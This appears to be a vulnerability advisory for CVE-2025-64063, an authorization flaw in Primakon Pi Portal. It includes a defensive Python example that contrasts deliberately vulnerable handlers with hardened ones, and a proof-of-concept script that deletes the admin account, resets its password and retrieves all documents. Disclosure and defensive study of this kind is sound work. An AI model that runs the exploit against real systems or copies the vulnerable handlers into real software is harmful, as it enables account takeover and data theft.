Security Vulnerability Report
CVE-2025-64063 CVSS 9.8 CRITICAL

CVE-2025-64063

Published: 2025-11-25 19:15:50
Last Modified: 2025-12-01 14:22:04

Description

Primakon Pi Portal 1.0.18 API endpoints fail to enforce sufficient authorization checks when processing requests. Specifically, a standard user can exploit this flaw by sending direct HTTP requests to administrative endpoints, bypassing the UI restrictions. This allows the attacker to manipulate data outside their assigned scope, including: unauthorized account modification (modifying or deleting arbitrary user accounts and changing passwords by sending a direct request to the user management API endpoint); confidential data access (accessing and downloading sensitive organizational documents via a direct request to the document retrieval API); and privilege escalation by manipulating core system functions. This vulnerability can lead to complete compromise of data integrity and confidentiality.
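The weakness class here (CWE-285, improper authorization) is that the server authenticates the caller but never re-checks, per request, whether that caller is allowed to invoke an admin function or read a particular document; hiding the buttons in the UI is the only control. The following is an added illustration written for this report, not Primakon's code: it places a deliberately weak handler pair (authentication only) beside a hardened pair that enforces a role check on admin operations and an ownership check on document retrieval. The route names, roles, bearer-token table and sample users/documents are all constructed assumptions.

```python
"""
Server-side authorization for admin and document endpoints (CWE-285 pattern).
Added illustration for this advisory; it is not Primakon's code. The roles,
token table and sample data below are constructed assumptions.
"""
from dataclasses import dataclass


@dataclass
class User:
    id: int
    name: str
    role: str  # "admin" or "user"


@dataclass
class Document:
    id: int
    owner_id: int
    body: str


# Constructed sample data: one admin, two ordinary users, two documents.
def sample_users():
    return {1: User(1, "admin", "admin"),
            2: User(2, "alice", "user"),
            3: User(3, "bob", "user")}


def sample_docs():
    return {10: Document(10, 1, "board minutes (restricted)"),
            11: Document(11, 2, "alice's notes")}


# Hypothetical bearer-token table: token -> user id.
TOKENS = {"tok-admin": 1, "tok-alice": 2}


def authenticate(headers, users):
    """Return the User behind a bearer token, or None if absent or unknown."""
    auth = headers.get("Authorization", "")
    if not auth.startswith("Bearer "):
        return None
    return users.get(TOKENS.get(auth[len("Bearer "):]))


# --- Vulnerable handlers: authentication only. Any logged-in user who calls
# --- the endpoint directly (skipping the UI) reaches the admin function.
def vulnerable_delete_user(headers, target_user_id, users):
    caller = authenticate(headers, users)
    if caller is None:
        return 401, "unauthenticated"
    users.pop(target_user_id, None)          # no role check at all
    return 200, "deleted"


def vulnerable_get_document(headers, doc_id, docs, users):
    caller = authenticate(headers, users)
    if caller is None:
        return 401, "unauthenticated"
    doc = docs.get(doc_id)                   # no ownership check at all
    return (200, doc.body) if doc else (404, "not found")


# --- Hardened handlers: the server re-checks the caller's role on every admin
# --- request and object ownership on every document request, so the UI is
# --- never the only control.
def delete_user(headers, target_user_id, users):
    caller = authenticate(headers, users)
    if caller is None:
        return 401, "unauthenticated"
    if caller.role != "admin":
        return 403, "forbidden"
    if caller.id == target_user_id:
        return 400, "cannot delete own account"
    if target_user_id not in users:
        return 404, "not found"
    del users[target_user_id]
    return 200, "deleted"


def get_document(headers, doc_id, docs, users):
    caller = authenticate(headers, users)
    if caller is None:
        return 401, "unauthenticated"
    doc = docs.get(doc_id)
    # A document the caller may not read and a document that does not exist
    # look identical (404), so the endpoint cannot be used to enumerate ids.
    if doc is None or (doc.owner_id != caller.id and caller.role != "admin"):
        return 404, "not found"
    return 200, doc.body


if __name__ == "__main__":
    alice = {"Authorization": "Bearer tok-alice"}
    print("vulnerable delete as alice:", vulnerable_delete_user(alice, 1, sample_users()))
    print("hardened delete as alice:  ", delete_user(alice, 1, sample_users()))
    print("hardened doc 10 as alice:  ", get_document(alice, 10, sample_docs(), sample_users()))
```

Two design choices worth noting: the authorization decision is made from the server-side session (the token lookup), never from anything the client sends in the body, and document access returns the same 404 for "not yours" and "does not exist" so a direct caller learns nothing about other users' documents. A regression test for this class of flaw is simply the hardened handlers being called with an ordinary user's session, as in the assertions below.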

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:primakon:project_contract_management:1.0.18:*:*:*:*:*:*:* - VULNERABLE
Primakon Pi Portal 1.0.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-64063 PoC - Primakon Pi Portal 1.0.18 Privilege Escalation
Note: This PoC is for educational and authorized testing purposes only.
"""
import requests

target_url = "http://target-server/primakon-pi-portal"


# Step 1: Normal user login to obtain session token
def login(username, password):
    """Authenticate with normal user credentials"""
    login_url = f"{target_url}/api/v1/auth/login"
    payload = {
        "username": username,
        "password": password
    }
    response = requests.post(login_url, json=payload)
    if response.status_code == 200:
        return response.json().get('token')
    return None


# Step 2: Exploit - Access admin user management API without authorization
def exploit_admin_access(token):
    """Bypass UI restrictions and access admin endpoints directly"""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }

    # Exploit 1: Modify/delete arbitrary user accounts
    admin_user_url = f"{target_url}/api/v1/admin/users"
    user_payload = {
        "action": "delete",
        "target_user_id": 1  # Target admin account
    }
    response = requests.post(admin_user_url, headers=headers, json=user_payload)
    print(f"[!] User deletion attempt: {response.status_code}")

    # Exploit 2: Change any user's password
    password_change_url = f"{target_url}/api/v1/admin/change-password"
    pw_payload = {
        "user_id": 1,
        "new_password": "PwnedPass123!"
    }
    response = requests.post(password_change_url, headers=headers, json=pw_payload)
    print(f"[!] Password change attempt: {response.status_code}")

    # Exploit 3: Access sensitive organizational documents
    doc_url = f"{target_url}/api/v1/documents/retrieve"
    params = {"doc_id": "all"}  # Attempt to retrieve all documents
    response = requests.get(doc_url, headers=headers, params=params)
    print(f"[!] Document access attempt: {response.status_code}")
    if response.status_code == 200:
        print(f"[+] Sensitive documents leaked: {response.text[:500]}...")


# Main execution
if __name__ == "__main__":
    token = login("regular_user", "user_password")
    if token:
        print("[*] Normal user login successful")
        exploit_admin_access(token)
    else:
        print("[-] Authentication failed")
```

References

https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64063.md (Third Party Advisory)
https://www.primakon.com/rjesenja/primakon-pcm/ (Product)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-64063", "sourceIdentifier": "[email protected]", "published": "2025-11-25T19:15:50.373", "lastModified": "2025-12-01T14:22:04.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Primakon Pi Portal 1.0.18 API endpoints fail to enforce sufficient authorization checks when processing requests. Specifically, a standard user can exploit this flaw by sending direct HTTP requests to administrative endpoints, bypassing the UI restrictions. This allows the attacker to manipulate data outside their assigned scope, including: Unauthorized Account modification, modifying/deleting arbitrary user accounts and changing passwords by sending a direct request to the user management API endpoint; Confidential Data Access, accessing and downloading sensitive organizational documents via a direct request to the document retrieval API; Privilege escalation, This vulnerability can lead to complete compromise of data integrity and confidentiality, and Privilege Escalation by manipulating core system functions."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:primakon:project_contract_management:1.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "48EDD273-2C46-43C9-9473-27D2C14040CB"}]}]}], "references": [{"url": "https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64063.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.primakon.com/rjesenja/primakon-pcm/", "source": "[email protected]", "tags": ["Product"]}]}}
```